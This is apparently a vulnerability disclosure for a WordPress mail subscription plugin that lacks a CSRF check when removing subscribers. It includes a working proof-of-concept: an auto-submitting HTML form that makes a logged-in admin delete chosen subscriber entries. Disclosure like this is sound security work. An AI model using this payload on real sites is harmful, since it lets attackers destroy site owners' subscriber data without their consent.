The plugin does not have CSRF check in place when deleting subscribed users, which could allow attackers to make a logged in admin perform such action and delete arbitrary users from the subscribed list
<form id="test" action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
<input type="text" name="sml_remove" value="1">
<input type="text" name="rem[]" value="1">
<input type="text" name="rem[]" value="4">
</form>
<script>
document.getElementById("test").submit();
</script>